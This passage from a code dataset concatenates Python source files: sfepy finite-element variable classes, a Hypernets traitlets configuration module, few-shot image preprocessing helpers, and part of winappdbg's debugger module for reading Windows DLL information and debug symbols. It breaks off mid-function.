if len(nod_list) == 0:
continue
fun = get_condition_value(val, functions, 'IC', ic.name)
if isinstance(fun, Function):
aux = fun
fun = lambda coors: aux(coors, ic=ic)
nods, vv = self.field.set_dofs(fun, region, len(dofs), clean_msg)
eq = expand_nodes_to_equations(nods, dofs, self.dofs)
self.initial_condition[eq] = nm.ravel(vv)
def get_data_shape(self, integral, integration='volume', region_name=None):
"""
Get element data dimensions for given approximation.
Parameters
----------
integral : Integral instance
The integral describing used numerical quadrature.
integration : 'volume', 'surface', 'surface_extra', 'point' or 'custom'
The term integration type.
region_name : str
The name of the region of the integral.
Returns
-------
data_shape : 5 ints
The `(n_el, n_qp, dim, n_en, n_comp)` for volume shape kind,
`(n_fa, n_qp, dim, n_fn, n_comp)` for surface shape kind and
`(n_nod, 0, 0, 1, n_comp)` for point shape kind.
Notes
-----
- `n_el`, `n_fa` = number of elements/facets
- `n_qp` = number of quadrature points per element/facet
- `dim` = spatial dimension
- `n_en`, `n_fn` = number of element/facet nodes
- `n_comp` = number of variable components in a point/node
- `n_nod` = number of element nodes
"""
aux = self.field.get_data_shape(integral, integration=integration,
region_name=region_name)
data_shape = aux + (self.n_components,)
return data_shape
def clear_evaluate_cache(self):
"""
Clear current evaluate cache.
"""
self.evaluate_cache = {}
def invalidate_evaluate_cache(self, step=0):
"""
Invalidate variable data in evaluate cache for time step given
by `step` (0 is current, -1 previous, ...).
This should be done, for example, prior to every nonlinear
solver iteration.
"""
for step_cache in six.itervalues(self.evaluate_cache):
for key in list(step_cache.keys()):
if key == step: # Given time step to clear.
step_cache.pop(key)
def evaluate(self, mode='val',
region=None, integral=None, integration=None,
step=0, time_derivative=None, is_trace=False,
trace_region=None, dt=None, bf=None):
"""
Evaluate various quantities related to the variable according to
`mode` in quadrature points defined by `integral`.
The evaluated data are cached in the variable instance in
`evaluate_cache` attribute.
Parameters
----------
mode : one of 'val', 'grad', 'div', 'cauchy_strain'
The evaluation mode.
region : Region instance, optional
The region where the evaluation occurs. If None, the
underlying field region is used.
integral : Integral instance, optional
The integral defining quadrature points in which the
evaluation occurs. If None, the first order volume integral
is created. Must not be None for surface integrations.
integration : 'volume', 'surface', 'surface_extra', or 'point'
The term integration type. If None, it is derived from
`integral`.
step : int, default 0
The time step (0 means current, -1 previous, ...).
time_derivative : None or 'dt'
If not None, return time derivative of the data,
approximated by the backward finite difference.
is_trace : bool, default False
Indicate evaluation of trace of the variable on a boundary
region.
dt : float, optional
            The time step to be used if `time_derivative` is `'dt'`. If None,
the `dt` attribute of the variable is used.
bf : Base function, optional
The base function to be used in 'val' mode.
Returns
-------
out : array
The 4-dimensional array of shape
`(n_el, n_qp, n_row, n_col)` with the requested data,
where `n_row`, `n_col` depend on `mode`.
"""
if integration == 'custom':
msg = 'cannot use FieldVariable.evaluate() with custom integration!'
raise ValueError(msg)
step_cache = self.evaluate_cache.setdefault(mode, {})
cache = step_cache.setdefault(step, {})
field = self.field
if region is None:
region = field.region
if is_trace:
region = region.get_mirror_region(trace_region)
if (region is not field.region) and not region.is_empty:
assert_(field.region.contains(region))
if integral is None:
integral = Integral('aux_1', 1)
if integration is None:
integration = 'volume' if region.can_cells else 'surface'
geo, _, key = field.get_mapping(region, integral, integration,
return_key=True)
key += (time_derivative, is_trace)
if key in cache:
out = cache[key]
else:
vec = self(step=step, derivative=time_derivative, dt=dt)
ct = integration
if integration == 'surface_extra':
ct = 'volume'
conn = field.get_econn(ct, region, is_trace, integration)
shape = self.get_data_shape(integral, integration, region.name)
if self.dtype == nm.float64:
out = eval_real(vec, conn, geo, mode, shape, bf)
else:
out = eval_complex(vec, conn, geo, mode, shape, bf)
cache[key] = out
return out
def get_state_in_region(self, region, reshape=True, step=0):
"""
Get DOFs of the variable in the given region.
Parameters
----------
region : Region
The selected region.
reshape : bool
If True, reshape the DOF vector to a 2D array with the individual
components as columns. Otherwise a 1D DOF array of the form [all
DOFs in region node 0, all DOFs in region node 1, ...] is returned.
step : int, default 0
The time step (0 means current, -1 previous, ...).
Returns
-------
out : array
The selected DOFs.
"""
nods = self.field.get_dofs_in_region(region, merge=True)
eq = nm.empty((len(nods) * self.n_components,), dtype=nm.int32)
for idof in range(self.n_components):
eq[idof::self.n_components] = self.n_components * nods \
+ idof + self.indx.start
out = self.data[step][eq]
if reshape:
out.shape = (len(nods), self.n_components)
return out
def apply_ebc(self, vec, offset=0, force_values=None):
"""
Apply essential (Dirichlet) and periodic boundary conditions to
vector `vec`, starting at `offset`.
"""
eq_map = self.eq_map
ii = offset + eq_map.eq_ebc
# EBC,
if force_values is None:
vec[ii] = eq_map.val_ebc
else:
if isinstance(force_values, dict):
vec[ii] = force_values[self.name]
else:
vec[ii] = force_values
# EPBC.
vec[offset+eq_map.master] = vec[offset+eq_map.slave]
def apply_ic(self, vec, offset=0, force_values=None):
"""
        Apply initial conditions to the vector `vec`, starting at
`offset`.
"""
ii = slice(offset, offset + self.n_dof)
if force_values is None:
vec[ii] = self.get_initial_condition()
else:
if isinstance(force_values, dict):
vec[ii] = force_values[self.name]
else:
vec[ii] = force_values
def get_reduced(self, vec, offset=0, follow_epbc=False):
"""
Get the reduced DOF vector, with EBC and PBC DOFs removed.
Notes
-----
The full vector starts in `vec` at `offset`. If 'follow_epbc' is True,
values of EPBC master DOFs are not simply thrown away, but added to the
corresponding slave DOFs, just like when assembling. For vectors with
state (unknown) variables it should be set to False, for assembled
vectors it should be set to True.
"""
eq_map = self.eq_map
ii = offset + eq_map.eqi
r_vec = vec[ii]
if follow_epbc:
master = offset + eq_map.master
slave = eq_map.eq[eq_map.slave]
ii = slave >= 0
la.assemble1d(r_vec, slave[ii], vec[master[ii]])
return r_vec
def get_full(self, r_vec, r_offset=0, force_value=None,
vec=None, offset=0):
"""
Get the full DOF vector satisfying E(P)BCs from a reduced DOF
vector.
Notes
-----
The reduced vector starts in `r_vec` at `r_offset`.
Passing a `force_value` overrides the EBC values. Optionally,
`vec` argument can be provided to store the full vector (in
place) starting at `offset`.
"""
if vec is None:
vec = nm.empty(self.n_dof, dtype=r_vec.dtype)
else:
vec = vec[offset:offset+self.n_dof]
eq_map = self.eq_map
r_vec = r_vec[r_offset:r_offset+eq_map.n_eq]
# EBC.
vec[eq_map.eq_ebc] = get_default(force_value, eq_map.val_ebc)
# Reduced vector values.
vec[eq_map.eqi] = r_vec
# EPBC.
vec[eq_map.master] = vec[eq_map.slave]
unused_dofs = self.field.get('unused_dofs')
if unused_dofs is not None:
vec[:] = self.field.restore_substituted(vec)
return vec
def create_output(self, vec=None, key=None, extend=True, fill_value=None,
linearization=None):
"""
Convert the DOF vector to a dictionary of output data usable by
Mesh.write().
Parameters
----------
vec : array, optional
An alternative DOF vector to be used instead of the variable
DOF vector.
key : str, optional
The key to be used in the output dictionary instead of the
variable name.
extend : bool
Extend the DOF values to cover the whole domain.
fill_value : float or complex
The value used to fill the missing DOF values if `extend` is True.
linearization : Struct or None
The linearization configuration for higher order approximations.
"""
linearization = get_default(linearization, Struct(kind='strip'))
if vec is None:
vec = self()
key = get_default(key, self.name)
aux = nm.reshape(vec,
(self.n_dof // self.n_components, self.n_components))
out = self.field.create_output(aux, self.name, dof_names=self.dofs,
key=key, extend=extend,
fill_value=fill_value,
linearization=linearization)
return out
def get_element_diameters(self, cells, mode, square=False):
"""Get diameters of selected elements."""
field = self.field
domain = field.domain
cells = nm.array(cells)
diameters = nm.empty((cells.shape[0],), dtype=nm.float64)
integral = Integral('i_tmp', 1)
vg, _ = field.get_mapping(field.region, integral, 'volume')
diameters = domain.get_element_diameters(cells, vg, mode, square=square)
return diameters
def save_as_mesh(self, filename):
"""
Save the field mesh and the variable values into a file for
visualization. Only the vertex values are stored.
"""
mesh = self.field.create_mesh(extra_nodes=False)
vec = self()
n_nod, n_dof, dpn = mesh.n_nod, self.n_dof, self.n_components
aux = nm.reshape(vec, (n_dof // dpn, dpn))
ext = self.field.extend_dofs(aux, 0.0)
out = {}
if self.field.approx_order != 0:
out[self.name] = Struct(name='output_data',
mode='vertex', data=ext,
var_name=self.name, dofs=self.dofs)
else:
ext.shape = (ext.shape[0], 1, ext.shape[1], 1)
out[self.name] = Struct(name='output_data',
mode='cell', data=ext,
var_name=self.name, dofs=self.dofs)
mesh.write(filename, io='auto', out=out)
def has_same_mesh(self, other):
"""
Returns
-------
flag : int
The flag can be either 'different' (different meshes), 'deformed'
(slightly deformed same mesh), or 'same' (same).
"""
f1 = self.field
f2 = other.field
c1 = f1.get_coor()
c2 = f2.get_coor()
if c1.shape != c2.shape:
flag = 'different'
else:
eps = 10.0 * nm.finfo(nm.float64).eps
if nm.allclose(c1, c2, rtol=eps, atol=0.0):
flag = 'same'
elif nm.allclose(c1, c2, rtol=0.1, atol=0.0):
flag = 'deformed'
else:
flag = 'different'
return flag
def get_interp_coors(self, strategy='interpolation', interp_term=None):
"""
Get the physical coordinates to interpolate into, based on the strategy
used.
"""
if strategy == 'interpolation':
coors = self.field.get_coor()
elif strategy == 'projection':
region = self.field.region
integral = Integral(term=interp_term)
coors = get_physical_qps(region, integral)
else:
raise ValueError('unknown interpolation strategy! (%s)' % strategy)
return coors
def evaluate_at(self, coors, mode='val', strategy='general',
close_limit=0.1, get_cells_fun=None,
cache=None, ret_cells=False,
ret_status=False, ret_ref_coors=False, verbose=False):
"""
Evaluate the variable in the given physical coordinates. Convenience
wrapper around :func:`Field.evaluate_at()
<sfepy.discrete.common.fields.Field.evaluate_at()>`, see its
docstring for more details.
"""
source_vals = self().reshape((self.n_nod, self.n_components))
out = self.field.evaluate_at(coors, source_vals,
mode=mode,
strategy=strategy,
close_limit=close_limit,
get_cells_fun=get_cells_fun,
cache=cache,
ret_cells=ret_cells,
ret_status=ret_status,
ret_ref_coors=ret_ref_coors,
verbose=verbose)
return out
def set_from_other(self, other, strategy='projection', close_limit=0.1):
"""
Set the variable using another variable. Undefined values (e.g. outside
the other mesh) are set to numpy.nan, or extrapolated.
Parameters
----------
strategy : 'projection' or 'interpolation'
The strategy to set the values: the L^2 orthogonal projection (not
implemented!), or a direct interpolation to the nodes (nodal
elements only!)
Notes
-----
If the other variable uses the same field mesh, the coefficients are
set directly.
"""
flag_same_mesh = self.has_same_mesh(other)
if flag_same_mesh == 'same':
self.set_data(other())
return
if strategy == 'interpolation':
coors = self.get_interp_coors(strategy)
elif strategy == 'projection':
## interp_term = Term() # TODO
## coors = self.get_interp_coors(strategy, interp_term)
pass
else:
raise ValueError('unknown interpolation strategy! (%s)' % strategy)
vals = other.evaluate_at(coors, strategy='general',
close_limit=close_limit)
if strategy == 'interpolation':
self.set_data(vals)
elif strategy == 'projection':
raise NotImplementedError('unsupported strategy! (%s)' % strategy)
else:
raise ValueError('unknown interpolation strategy! (%s)' % strategy)
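# A usage sketch (assumes `u` is a FieldVariable from an already set-up sfepy
# problem and that Integral is importable from sfepy.discrete): evaluating the
# variable and its gradient in quadrature points, cf. FieldVariable.evaluate().
def _example_evaluate_in_qp(u):
    from sfepy.discrete import Integral
    integral = Integral('i', order=2)
    vals = u.evaluate(mode='val', integral=integral)
    grads = u.evaluate(mode='grad', integral=integral)
    # Both arrays have the 4D shape (n_el, n_qp, n_row, n_col) described above.
    return vals, grads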
class DGFieldVariable(FieldVariable):
"""
    Field variable specifically intended for use with DGFields; it bypasses
    the application of EBCs and EPBCs, as these are handled in DGField.
    Instances of this class are checked for in create_adof_conns.
"""
def __init__(self, name, kind, field, order=None, primary_var_name=None,
special=None, flags=None, history=None, **kwargs):
FieldVariable.__init__(self, name, kind, field, order=order,
primary_var_name=primary_var_name,
special=special, flags=flags,
history=history, **kwargs)
from sfepy.discrete.dg.fields import DGField
if isinstance(field, DGField):
pass
else:
            raise ValueError("Attempted to use DGFieldVariable with a non-DGField field!")
def apply_ebc(self, vec, offset=0, force_values=None):
pass
def get_full(self, r_vec, r_offset=0, force_value=None,
vec=None, offset=0):
"""
Get the full DOF vector satisfying E(P)BCs from a reduced DOF
vector.
Notes
-----
The reduced vector starts in `r_vec` at `r_offset`.
Passing a `force_value` overrides the EBC values. Optionally,
`vec` argument can be provided to store the full vector (in
place) starting at `offset`.
"""
if vec is None:
vec = nm.empty(self.n_dof, dtype=r_vec.dtype)
else:
vec = vec[offset:offset+self.n_dof]
eq_map = self.eq_map
r_vec = r_vec[r_offset:r_offset+eq_map.n_eq]
        # override to hotfix second application of EBCs
# # EBC.
# vec[eq_map.eq_ebc] = get_default(force_value, eq_map.val_ebc)
# Reduced vector values, for DG this is full vector as eq_map.eq
# contains all dofs, cf. create_adof_conns
vec[eq_map.eqi] = r_vec
# EPBC.
# vec[eq_map.master] = vec[eq_map.slave]
unused_dofs = self.field.get('unused_dofs')
if unused_dofs is not None:
vec[:] = self.field.restore_substituted(vec)
return vec |
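# Sketch (hypothetical helper, appended for illustration): round-tripping
# between the reduced DOF vector (EBCs/EPBCs stripped) and the full DOF vector
# of a variable, cf. get_reduced() and get_full() above.
def _example_reduced_full_roundtrip(var, full_vec):
    r_vec = var.get_reduced(full_vec)
    full_again = var.get_full(r_vec)
    return r_vec, full_again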
hypernets/conf/_configuration.py | Enpen/Hypernets | 1,080 | 11195071 | <reponame>Enpen/Hypernets
import glob
import os
import sys
from traitlets import Unicode
from traitlets.config import Application, Configurable
class Configuration(Application):
config_dir = Unicode('./conf',
help='The file system directory which contains all configuration files'
).tag(config=True)
aliases = {
'log-level': 'Application.log_level',
'config-dir': 'Configuration.config_dir',
}
def __init__(self, **kwargs):
super(Configuration, self).__init__(**kwargs)
aliases_keys = self.aliases.keys()
argv = [a for a in sys.argv if any([a.startswith(f'--{k}') for k in aliases_keys])]
super(Configuration, self).initialize(argv)
if len(self.config_dir) > 0:
config_dir = os.path.abspath(os.path.expanduser(self.config_dir))
for f in glob.glob(f'{config_dir}/*.py', recursive=False):
self.load_config_file(f)
_conf = Configuration()
generate_config_file = _conf.generate_config_file
def configure():
"""
    Decorator utility to configure a single configurable class
"""
def wrapper(c):
assert issubclass(c, Configurable)
o = c(parent=_conf)
if c not in _conf.classes:
_conf.classes += [c]
return o
return wrapper
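# A minimal usage sketch (hypothetical class and trait names): @configure()
# registers a Configurable subclass with the shared Configuration instance and
# binds the name to a configured *instance*, whose tagged traits can then be
# overridden by files in Configuration.config_dir.
def _example_configure_usage():
    @configure()
    class ExampleCfg(Configurable):
        greeting = Unicode('hello').tag(config=True)
    return ExampleCfg  # already an instance, e.g. ExampleCfg.greeting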
def configure_and_observe(obj, observe_names, observe_handle):
"""
    Decorator utility to configure a configurable class and observe it (or another configured one)
"""
assert (obj is None or isinstance(obj, Configurable)) \
and callable(observe_handle) \
and isinstance(observe_names, (tuple, list, str))
def wrapper_and_observe(c):
assert issubclass(c, Configurable)
o = c(parent=_conf)
if c not in _conf.classes:
_conf.classes += [c]
names = observe_names if isinstance(observe_names, (tuple, list)) else [observe_names]
if obj is None:
o.observe(observe_handle, names)
else:
obj.observe(observe_handle, names)
return o
return wrapper_and_observe
def observe(obj, names, handle):
"""
    A utility to observe a configured object
"""
assert isinstance(obj, Configurable) and callable(handle) \
and isinstance(names, (tuple, list, str))
names = names if isinstance(names, (tuple, list)) else [names]
obj.observe(handle, names)
return obj
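# A small sketch (hypothetical trait name 'greeting'): attaching a change
# handler to an already configured object via observe(); traitlets passes a
# change dict with 'old' and 'new' values to the handler.
def _example_observe_usage(cfg_obj):
    def on_change(change):
        print(change['old'], '->', change['new'])
    return observe(cfg_obj, 'greeting', on_change)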
|
fewshots/data/utils.py | bertinetto/r2d2 | 111 | 11195075 | <gh_stars>100-1000
from PIL import Image
import torch
import numpy as np
from torchvision import transforms
normalize_mini_t = transforms.Normalize(mean=[x / 255.0 for x in [120.39586422, 115.59361427, 104.54012653]],
std=[x / 255.0 for x in [70.68188272, 68.27635443, 72.54505529]])
normalize_cifar_t = transforms.Normalize(mean=[x / 255.0 for x in [125.3, 123.0, 113.9]],
std=[x / 255.0 for x in [63.0, 62.1, 66.7]])
def nop(d):
return d
def load_image_path(key, out_field, d):
d[out_field] = Image.open(d[key])
return d
def to_tensor(key, d):
d[key] = transforms.functional.to_tensor(d[key])
return d
def convert_tensor(key, d):
d[key] = 1.0 - torch.from_numpy(np.array(d[key], np.float32, copy=False)).transpose(0, 1).contiguous().view(1, d[
key].size[0], d[key].size[1])
return d
def rotate_image(key, rot, d):
d[key] = d[key].rotate(rot)
return d
def scale_image(key, height, width, d):
d[key] = d[key].resize((height, width))
return d
def crop(key, crop_transforms, max_crop_shrink, d):
transform_id = np.random.randint(max_crop_shrink)
d[key] = crop_transforms[transform_id](d[key])
return d
def normalize_mini_image(key, d):
d[key] = normalize_mini_t(d[key])
return d
def normalize_cifar_image(key, d):
d[key] = normalize_cifar_t(d[key])
return d
|
venv/Lib/site-packages/debugpy/_vendored/pydevd/pydevd_attach_to_process/winappdbg/module.py | ajayiagbebaku/NFL-Model | 695 | 11195083 | #!~/.wine/drive_c/Python25/python.exe
# -*- coding: utf-8 -*-
# Copyright (c) 2009-2014, <NAME>
# All rights reserved.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are met:
#
# * Redistributions of source code must retain the above copyright notice,
# this list of conditions and the following disclaimer.
# * Redistributions in binary form must reproduce the above copyright
# notice,this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution.
# * Neither the name of the copyright holder nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"
# AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE
# IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE
# ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT OWNER OR CONTRIBUTORS BE
# LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR
# CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF
# SUBSTITUTE GOODS OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS
# INTERRUPTION) HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN
# CONTRACT, STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE)
# ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE
# POSSIBILITY OF SUCH DAMAGE.
"""
Module instrumentation.
@group Instrumentation:
Module
@group Warnings:
DebugSymbolsWarning
"""
from __future__ import with_statement
__revision__ = "$Id$"
__all__ = ['Module', 'DebugSymbolsWarning']
import sys
from winappdbg import win32
from winappdbg import compat
from winappdbg.textio import HexInput, HexDump
from winappdbg.util import PathOperations
# delayed imports
Process = None
import os
import warnings
import traceback
#==============================================================================
class DebugSymbolsWarning (UserWarning):
"""
This warning is issued if the support for debug symbols
isn't working properly.
"""
#==============================================================================
class Module (object):
"""
Interface to a DLL library loaded in the context of another process.
@group Properties:
get_base, get_filename, get_name, get_size, get_entry_point,
get_process, set_process, get_pid,
get_handle, set_handle, open_handle, close_handle
@group Labels:
get_label, get_label_at_address, is_address_here,
resolve, resolve_label, match_name
@group Symbols:
load_symbols, unload_symbols, get_symbols, iter_symbols,
resolve_symbol, get_symbol_at_address
@group Modules snapshot:
clear
@type unknown: str
@cvar unknown: Suggested tag for unknown modules.
@type lpBaseOfDll: int
@ivar lpBaseOfDll: Base of DLL module.
Use L{get_base} instead.
@type hFile: L{FileHandle}
@ivar hFile: Handle to the module file.
Use L{get_handle} instead.
@type fileName: str
@ivar fileName: Module filename.
Use L{get_filename} instead.
@type SizeOfImage: int
@ivar SizeOfImage: Size of the module.
Use L{get_size} instead.
@type EntryPoint: int
@ivar EntryPoint: Entry point of the module.
Use L{get_entry_point} instead.
@type process: L{Process}
@ivar process: Process where the module is loaded.
Use the L{get_process} method instead.
"""
unknown = '<unknown>'
class _SymbolEnumerator (object):
"""
Internally used by L{Module} to enumerate symbols in a module.
"""
def __init__(self, undecorate = False):
self.symbols = list()
self.undecorate = undecorate
def __call__(self, SymbolName, SymbolAddress, SymbolSize, UserContext):
"""
Callback that receives symbols and stores them in a Python list.
"""
if self.undecorate:
try:
SymbolName = win32.UnDecorateSymbolName(SymbolName)
except Exception:
pass # not all symbols are decorated!
self.symbols.append( (SymbolName, SymbolAddress, SymbolSize) )
return win32.TRUE
def __init__(self, lpBaseOfDll, hFile = None, fileName = None,
SizeOfImage = None,
EntryPoint = None,
process = None):
"""
@type lpBaseOfDll: str
@param lpBaseOfDll: Base address of the module.
@type hFile: L{FileHandle}
@param hFile: (Optional) Handle to the module file.
@type fileName: str
@param fileName: (Optional) Module filename.
@type SizeOfImage: int
@param SizeOfImage: (Optional) Size of the module.
@type EntryPoint: int
@param EntryPoint: (Optional) Entry point of the module.
@type process: L{Process}
@param process: (Optional) Process where the module is loaded.
"""
self.lpBaseOfDll = lpBaseOfDll
self.fileName = fileName
self.SizeOfImage = SizeOfImage
self.EntryPoint = EntryPoint
self.__symbols = list()
self.set_handle(hFile)
self.set_process(process)
# Not really sure if it's a good idea...
## def __eq__(self, aModule):
## """
## Compare two Module objects. The comparison is made using the process
## IDs and the module bases.
##
## @type aModule: L{Module}
## @param aModule: Another Module object.
##
## @rtype: bool
## @return: C{True} if the two process IDs and module bases are equal,
## C{False} otherwise.
## """
## return isinstance(aModule, Module) and \
## self.get_pid() == aModule.get_pid() and \
## self.get_base() == aModule.get_base()
def get_handle(self):
"""
@rtype: L{Handle}
@return: File handle.
Returns C{None} if unknown.
"""
# no way to guess!
return self.__hFile
def set_handle(self, hFile):
"""
@type hFile: L{Handle}
@param hFile: File handle. Use C{None} to clear.
"""
if hFile == win32.INVALID_HANDLE_VALUE:
hFile = None
self.__hFile = hFile
hFile = property(get_handle, set_handle, doc="")
def get_process(self):
"""
@rtype: L{Process}
@return: Parent Process object.
Returns C{None} if unknown.
"""
# no way to guess!
return self.__process
def set_process(self, process = None):
"""
Manually set the parent process. Use with care!
@type process: L{Process}
@param process: (Optional) Process object. Use C{None} for no process.
"""
if process is None:
self.__process = None
else:
global Process # delayed import
if Process is None:
from winappdbg.process import Process
if not isinstance(process, Process):
msg = "Parent process must be a Process instance, "
msg += "got %s instead" % type(process)
raise TypeError(msg)
self.__process = process
process = property(get_process, set_process, doc="")
def get_pid(self):
"""
@rtype: int or None
@return: Parent process global ID.
Returns C{None} on error.
"""
process = self.get_process()
if process is not None:
return process.get_pid()
def get_base(self):
"""
@rtype: int or None
@return: Base address of the module.
Returns C{None} if unknown.
"""
return self.lpBaseOfDll
def get_size(self):
"""
@rtype: int or None
@return: Base size of the module.
Returns C{None} if unknown.
"""
if not self.SizeOfImage:
self.__get_size_and_entry_point()
return self.SizeOfImage
def get_entry_point(self):
"""
@rtype: int or None
@return: Entry point of the module.
Returns C{None} if unknown.
"""
if not self.EntryPoint:
self.__get_size_and_entry_point()
return self.EntryPoint
def __get_size_and_entry_point(self):
"Get the size and entry point of the module using the Win32 API."
process = self.get_process()
if process:
try:
handle = process.get_handle( win32.PROCESS_VM_READ |
win32.PROCESS_QUERY_INFORMATION )
base = self.get_base()
mi = win32.GetModuleInformation(handle, base)
self.SizeOfImage = mi.SizeOfImage
self.EntryPoint = mi.EntryPoint
except WindowsError:
e = sys.exc_info()[1]
warnings.warn(
"Cannot get size and entry point of module %s, reason: %s"\
% (self.get_name(), e.strerror), RuntimeWarning)
def get_filename(self):
"""
@rtype: str or None
@return: Module filename.
Returns C{None} if unknown.
"""
if self.fileName is None:
if self.hFile not in (None, win32.INVALID_HANDLE_VALUE):
fileName = self.hFile.get_filename()
if fileName:
fileName = PathOperations.native_to_win32_pathname(fileName)
self.fileName = fileName
return self.fileName
def __filename_to_modname(self, pathname):
"""
@type pathname: str
@param pathname: Pathname to a module.
@rtype: str
@return: Module name.
"""
filename = PathOperations.pathname_to_filename(pathname)
if filename:
filename = filename.lower()
filepart, extpart = PathOperations.split_extension(filename)
if filepart and extpart:
modName = filepart
else:
modName = filename
else:
modName = pathname
return modName
def get_name(self):
"""
@rtype: str
@return: Module name, as used in labels.
@warning: Names are B{NOT} guaranteed to be unique.
If you need unique identification for a loaded module,
use the base address instead.
@see: L{get_label}
"""
pathname = self.get_filename()
if pathname:
modName = self.__filename_to_modname(pathname)
if isinstance(modName, compat.unicode):
try:
modName = modName.encode('cp1252')
except UnicodeEncodeError:
e = sys.exc_info()[1]
warnings.warn(str(e))
else:
modName = "0x%x" % self.get_base()
return modName
def match_name(self, name):
"""
@rtype: bool
@return:
C{True} if the given name could refer to this module.
It may not be exactly the same returned by L{get_name}.
"""
# If the given name is exactly our name, return True.
# Comparison is case insensitive.
my_name = self.get_name().lower()
if name.lower() == my_name:
return True
# If the given name is a base address, compare it with ours.
try:
base = HexInput.integer(name)
except ValueError:
base = None
if base is not None and base == self.get_base():
return True
# If the given name is a filename, convert it to a module name.
# Then compare it with ours, case insensitive.
modName = self.__filename_to_modname(name)
if modName.lower() == my_name:
return True
# No match.
return False
#------------------------------------------------------------------------------
def open_handle(self):
"""
Opens a new handle to the module.
The new handle is stored in the L{hFile} property.
"""
if not self.get_filename():
msg = "Cannot retrieve filename for module at %s"
msg = msg % HexDump.address( self.get_base() )
raise Exception(msg)
hFile = win32.CreateFile(self.get_filename(),
dwShareMode = win32.FILE_SHARE_READ,
dwCreationDisposition = win32.OPEN_EXISTING)
# In case hFile was set to an actual handle value instead of a Handle
# object. This shouldn't happen unless the user tinkered with hFile.
if not hasattr(self.hFile, '__del__'):
self.close_handle()
self.hFile = hFile
def close_handle(self):
"""
Closes the handle to the module.
@note: Normally you don't need to call this method. All handles
created by I{WinAppDbg} are automatically closed when the garbage
collector claims them. So unless you've been tinkering with it,
setting L{hFile} to C{None} should be enough.
"""
try:
if hasattr(self.hFile, 'close'):
self.hFile.close()
elif self.hFile not in (None, win32.INVALID_HANDLE_VALUE):
win32.CloseHandle(self.hFile)
finally:
self.hFile = None
def get_handle(self):
"""
@rtype: L{FileHandle}
@return: Handle to the module file.
"""
if self.hFile in (None, win32.INVALID_HANDLE_VALUE):
self.open_handle()
return self.hFile
def clear(self):
"""
Clears the resources held by this object.
"""
try:
self.set_process(None)
finally:
self.close_handle()
#------------------------------------------------------------------------------
# XXX FIXME
# I've been told sometimes the debugging symbols APIs don't correctly
# handle redirected exports (for example ws2_32!recv).
# I haven't been able to reproduce the bug yet.
def load_symbols(self):
"""
Loads the debugging symbols for a module.
Automatically called by L{get_symbols}.
"""
if win32.PROCESS_ALL_ACCESS == win32.PROCESS_ALL_ACCESS_VISTA:
dwAccess = win32.PROCESS_QUERY_LIMITED_INFORMATION
else:
dwAccess = win32.PROCESS_QUERY_INFORMATION
hProcess = self.get_process().get_handle(dwAccess)
hFile = self.hFile
BaseOfDll = self.get_base()
SizeOfDll = self.get_size()
Enumerator = self._SymbolEnumerator()
try:
win32.SymInitialize(hProcess)
SymOptions = win32.SymGetOptions()
SymOptions |= (
win32.SYMOPT_ALLOW_ZERO_ADDRESS |
win32.SYMOPT_CASE_INSENSITIVE |
win32.SYMOPT_FAVOR_COMPRESSED |
win32.SYMOPT_INCLUDE_32BIT_MODULES |
win32.SYMOPT_UNDNAME
)
SymOptions &= ~(
win32.SYMOPT_LOAD_LINES |
win32.SYMOPT_NO_IMAGE_SEARCH |
win32.SYMOPT_NO_CPP |
win32.SYMOPT_IGNORE_NT_SYMPATH
)
win32.SymSetOptions(SymOptions)
try:
win32.SymSetOptions(
SymOptions | win32.SYMOPT_ALLOW_ABSOLUTE_SYMBOLS)
except WindowsError:
pass
try:
try:
success = win32.SymLoadModule64(
hProcess, hFile, None, None, BaseOfDll, SizeOfDll)
except WindowsError:
success = 0
if not success:
ImageName = self.get_filename()
success = win32.SymLoadModule64(
hProcess, None, ImageName, None, BaseOfDll, SizeOfDll)
if success:
try:
win32.SymEnumerateSymbols64(
hProcess, BaseOfDll, Enumerator)
finally:
win32.SymUnloadModule64(hProcess, BaseOfDll)
finally:
win32.SymCleanup(hProcess)
except WindowsError:
e = sys.exc_info()[1]
msg = "Cannot load debug symbols for process ID %d, reason:\n%s"
msg = msg % (self.get_pid(), traceback.format_exc(e))
warnings.warn(msg, DebugSymbolsWarning)
self.__symbols = Enumerator.symbols
def unload_symbols(self):
"""
Unloads the debugging symbols for a module.
"""
self.__symbols = list()
def get_symbols(self):
"""
Returns the debugging symbols for a module.
The symbols are automatically loaded when needed.
@rtype: list of tuple( str, int, int )
@return: List of symbols.
Each symbol is represented by a tuple that contains:
- Symbol name
- Symbol memory address
- Symbol size in bytes
"""
if not self.__symbols:
self.load_symbols()
return list(self.__symbols)
def iter_symbols(self):
"""
Returns an iterator for the debugging symbols in a module,
in no particular order.
The symbols are automatically loaded when needed.
@rtype: iterator of tuple( str, int, int )
@return: Iterator of symbols.
Each symbol is represented by a tuple that contains:
- Symbol name
- Symbol memory address
- Symbol size in bytes
"""
if not self.__symbols:
self.load_symbols()
return self.__symbols.__iter__()
def resolve_symbol(self, symbol, bCaseSensitive = False):
"""
Resolves a debugging symbol's address.
@type symbol: str
@param symbol: Name of the symbol to resolve.
@type bCaseSensitive: bool
@param bCaseSensitive: C{True} for case sensitive matches,
C{False} for case insensitive.
@rtype: int or None
@return: Memory address of symbol. C{None} if not found.
"""
if bCaseSensitive:
for (SymbolName, SymbolAddress, SymbolSize) in self.iter_symbols():
if symbol == SymbolName:
return SymbolAddress
for (SymbolName, SymbolAddress, SymbolSize) in self.iter_symbols():
try:
SymbolName = win32.UnDecorateSymbolName(SymbolName)
except Exception:
continue
if symbol == SymbolName:
return SymbolAddress
else:
symbol = symbol.lower()
